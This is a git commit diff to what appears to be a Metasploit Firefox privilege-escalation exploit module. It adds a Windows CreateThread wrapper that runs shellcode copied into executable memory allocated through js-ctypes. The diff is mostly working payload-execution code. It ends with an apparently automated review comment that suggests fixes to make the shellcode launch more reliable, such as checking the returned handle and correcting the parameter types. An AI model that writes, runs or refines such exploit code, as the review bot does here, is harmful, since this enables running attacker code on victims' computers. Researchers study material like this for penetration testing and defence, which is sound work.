Add CreateThread wrapper for windows.

Joe Vennix 2014-03-12 02:49:09 -05:00
parent ce0c5380a5
commit 7afcb6aee8
1 changed files with 12 additions and 3 deletions


@ -52,9 +52,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode);
//var bytes = ctypes.char.array()(shellcode).length-1;
memcpy(buff, cstr, bytes);
@ -81,12 +79,23 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var CreateThread = ctypes.open("Kernel32.dll").declare('CreateThread',
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* lpThreadAttributes */
ctypes.voidptr_t, /* dwStackSize */
ctypes.voidptr_t, /* lpStartAddress copy */
ctypes.voidptr_t, /* lpParameter */
ctypes.voidptr_t, /* dwCreationFlags */
ctypes.voidptr_t /* lpThreadId */
);
var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
var cstr = ctypes.jschar.array()(shellcode);
memcpy(buff, cstr, bytes);
var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/);
if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
var fn = ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
CreateThread(null, null, fn, null, null, null);
};
var i, errs = [], fns = [execWindows, execPosix];
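Review bot: The handle returned by the new `CreateThread(null, null, fn, null, null, null);` line is discarded, so a NULL return (thread creation failed) goes unnoticed and execWindows returns as if the payload were running; change it to `var hThread = CreateThread(null, null, fn, null, null, null);` followed by `if (hThread.isNull()) throw new Error("CreateThread failed: " + ctypes.winLastError);`. Unlike the removed direct call through the function pointer, the new code also returns before the shellcode has executed, which the loop over fns on the following line may not account for if it treats a clean return as success — worth a one-line comment on the CreateThread call. The declaration types the SIZE_T dwStackSize and DWORD dwCreationFlags/lpThreadId parameters as voidptr_t; presumably this works in practice because only nulls are passed, but `ctypes.size_t`, `ctypes.uint32_t` and `ctypes.uint32_t.ptr` would match the kernel32 signature. The stray word in `/* lpStartAddress copy */` looks copy-pasted from the memcpy declaration above and should read `/* lpStartAddress */`. execWindows's body starts outside the hunk.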